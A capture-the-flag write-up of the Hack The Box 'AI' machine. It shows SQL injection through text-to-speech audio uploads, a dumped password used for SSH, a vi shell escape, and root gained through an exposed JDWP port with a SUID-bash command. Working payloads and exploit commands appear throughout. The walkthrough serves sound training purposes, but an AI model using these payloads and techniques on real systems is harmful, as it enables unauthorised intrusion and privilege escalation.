AI - Hack The Box

Exploiting the simple SQL injection vulnerability on the AI box was harder than expected because of the text-to-speech conversion required. I had to use a few tricks to inject the single quote in the query and the other parameters needed for the injection.

Summary

  • There is a web application with a speech based API interface that contains a SQL injection
  • By using a text-to-speech tool we can create a wav file that contains a payload to exploit the SQL injection
  • The user credentials are retrieved from the database and we can SSH in
  • The Java Debug Wire Protocol (JDWP) is enabled on the running Tomcat server and its port is exposed locally
  • We can execute arbitrary code as root using JDWP

Blog / Tools

Nmap

The attack surface is pretty small on this box: I only see SSH and HTTP listening.

root@kali:~/htb/ai# nmap -sC -sV -T4 10.10.10.163
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 09:53 EST
Nmap scan report for ai.htb (10.10.10.163)
Host is up (0.046s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
|   256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_  256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web enumeration

What we have here is some company that does voice recognition from audio files. There’s a link to upload wav files so this is probably the function that we have to exploit in order to progress on this machine.

I did my normal gobuster enumeration and found a couple of additional files that didn’t show up on the main page.

root@kali:~/htb/ai# gobuster dir -q -t 50 -w /opt/SecLists/Discovery/Web-Content/big.txt -x php -u http://10.10.10.163
/about.php (Status: 200)
/ai.php (Status: 200)
/contact.php (Status: 200)
/db.php (Status: 200)
/images (Status: 301)
/index.php (Status: 200)
/intelligence.php (Status: 200)
/server-status (Status: 403)
/uploads (Status: 301)

Interesting files:

  • db.php: this is probably used to connect to some database backend so there may a SQLi I have to exploit here
  • intelligence.php: this contains a list of voice input commands that are converted to special commands on the backend

SQL injection on the voice API page

The most annoying of this machine was finding a text to speech application that would produce reliable results. I tried a bunch of different online and offline tools but some of them produced files that did not decode properly on the target machine. I used https://ttsmp3.com and with the help of some scripting I’m able to automate the creation and conversion of the voice file.

#!/bin/bash

TXT=$1
URL=$(curl -s https://ttsmp3.com/makemp3.php -H 'Content-type: application/x-www-form-urlencoded' --data "msg=$TXT" -d 'lang=Joey' -d 'source=ttsmp3' | jq -r .URL)
curl -s -o speak.mp3 $URL
ffmpeg -v 0 -y -i speak.mp3 speak.wav
curl -s http://ai.htb/ai.php -F fileToUpload='@speak.wav;type=audio/x-wav' -F submit='Process It!' | grep "Our understanding"

I can see below that the script works but unfortunately quote doesn’t get converted to its character equivalent so I can’t inject that way.

./tts.sh hello
<h3>Our understanding of your input is : hello<br />Query result : <h3>

./tts.sh quote
<h3>Our understanding of your input is : quote<br />Query result : <h3>

By using the word it's, the application generates a quote and I can see that we have a MySQL SQL injection here.

./tts.sh "its or one equals one Comment Database"
<h3>Our understanding of your input is : it's or 1 = 1 -- -<br />Query result : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 's or 1 = 1 -- -'' at line 1<

By using open single quote in the audio file, it will generate a single quote and I can use a simple 1=1 condition to return all entries from the database. In this case, the print("hi") row is shown.

root@kali:~/htb/ai# ./tts.sh "open single quote ore one equals one Comment Database"
<h3>Our understanding of your input is : 'or 1 = 1 -- -<br />Query result : print("hi")<h3>

I guessed that the table I had to check out was users and I was able to retrieve the password with the following query: ' UNION SELECT password FROM users -- -

./tts.sh "open single quote union select password from users Comment Database"
<h3>Our understanding of your input is : 'union select password from users -- -<br />Query result : H,Sq9t6}a<)?q93_<h3>

Password: H,Sq9t6}a<)?q93_

I don’t have the username and I can’t do a query like ' UNION SELECT username FROM users -- - because the application will read it as ' UNION SELECT user name FROM users -- - instead. However before the box was released it was called Alexa so I just guessed that the username was Alexa and I was able to SSH in.

root@kali:~/htb/ai# ssh alexa@10.10.10.163
alexa@10.10.10.163's password: 

alexa@AI:~$ cat user.txt
c43b62...

Trying to exploit the UID bug

Alexa can run vi as any user except root. There is a well known trick I can use to spawn a shell from within vi with :!/bin/bash but since I can’t sudo vi as root I can only get access to mrr3boot.

alexa@AI:~$ sudo -l
[sudo] password for alexa: 
Matching Defaults entries for alexa on AI:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alexa may run the following commands on AI:
    (ALL, !root) /usr/bin/vi

alexa@AI:~$ lslogins
       UID USER            PROC PWD-LOCK PWD-DENY  LAST-LOGIN GECOS
         0 root             127                   Nov04/09:42 root
         1 daemon             1                               daemon
         2 bin                0                               bin
         3 sys                0                               sys
         4 sync               0                               sync
         5 games              0                               games
         6 man                0                               man
         7 lp                 0                               lp
         8 mail               0                               mail
         9 news               0                               news
        10 uucp               0                               uucp
        13 proxy              0                               proxy
        33 www-data          10                               www-data
        34 backup             0                               backup
        38 list               0                               Mailing List Manager
        39 irc                0                               ircd
        41 gnats              0                               Gnats Bug-Reporting System (admin)
       100 systemd-network    0                               systemd Network Management,,,
       101 systemd-resolve    1                               systemd Resolver,,,
       102 syslog             1                               
       103 messagebus         1                               
       104 _apt               0                               
       105 lxd                0                               
       106 uuidd              0                               
       107 dnsmasq            0                               dnsmasq,,,
       108 landscape          0                               
       109 pollinate          0                               
       110 sshd               0                               
       111 mysql              1                               MySQL Server,,,
       112 rtkit              0                               RealtimeKit,,,
       113 pulse              0                               PulseAudio daemon,,,
       114 avahi              2                               Avahi mDNS daemon,,,
       115 geoclue            0                               
      1000 alexa              5                         15:32 alexa
     65534 nobody             0                               nobody
4000000000 mrr3boot           0    
alexa@AI:~$ sudo -u mrr3boot vi
:!/bin/bash
mrr3boot@AI:~$ id
uid=4000000000(mrr3boot) gid=1001(mrr3boot) groups=1001(mrr3boot)

That high UID is very strange and after doing some research I found a systemd bug that should have let me run any systemctl commands.

Unfortunately even though the pkttyagent seems to crash, I was not able to exploit the bug:

mrr3boot@AI:~$ systemctl restart ssh
**
ERROR:pkttyagent.c:175:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)
Failed to restart ssh.service: Interactive authentication required.
See system logs and 'systemctl status ssh.service' for details.

This seems like a dead end so I’ll move on to something else.

Privesc with Java Debug Wire Protocol

Looking at the listening ports I found ports 8000, 8005, 8009 and 8080 listening on localhost.

(No info could be read for "-p": geteuid()=-294967296 but you should be root.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                   
tcp        0    492 10.10.10.163:22         10.10.14.51:38906       ESTABLISHED -                   
tcp6       0      0 127.0.0.1:8080          :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      -                   
tcp6       0      0 127.0.0.1:8009          :::*                    LISTEN      -                   
udp        0      0 0.0.0.0:49179           0.0.0.0:*                           -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           -                   
udp6       0      0 :::38547                :::*                                -                   
udp6       0      0 :::5353                 :::*                                -

I did some port forwarding and saw that port 8080 is running the Tomcat manager but I was not able to log in using any of the default credentials.

Then I noticed that the Tomcat server has the JDWP option enabled: jdwp=transport=dt_socket,address=localhost:8000,server=y

/usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager 
-Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 
-agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -Dignore.endorsed.dirs= -classpath /opt/apache-tomcat-9.0.27/bin/bootstrap.jar:/opt/
apache-tomcat-9.0.27/bin/tomcat-juli.jar -Dcatalina.base=/opt/apache-tomcat-9.0.27 -Dcatalina.home=/opt/apache-tomcat-9.0.27 -Djava.io.tmpdir=/opt/apache-tomcat-9.0.27/temp 
org.apache.catalina.startup.Bootstrap start

I used the https://www.exploit-db.com/exploits/46501 exploit to get RCE as root. I chose to make /bin/bash SUID so I could just get a shell directly by using bash -p. I need to trigger a connection to port 8005 locally on the machine after I’ve launched the exploit.

root@kali:~/htb/ai# python jdwp.py -t 127.0.0.1 -p 8000 --cmd 'chmod u+s /bin/bash'
[+] Targeting '127.0.0.1:8000'
[+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.4'
[+] Found Runtime class: id=bc4
[+] Found Runtime.getRuntime(): id=7fe7f003e960
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'
[+] Received matching event from thread 0xc69
[+] Selected payload 'chmod u+s /bin/bash'
[+] Command string object created id:c6a
[+] Runtime.getRuntime() returned context id:0xc6b
[+] found Runtime.exec(): id=7fe7f003e998
[+] Runtime.exec() successful, retId=c6c
[!] Command successfully executed
alexa@AI:~$ /bin/bash -p
bash-4.4# id
uid=1000(alexa) gid=1000(alexa) euid=0(root) groups=1000(alexa)
bash-4.4# cat /root/root.txt
0ed04f2...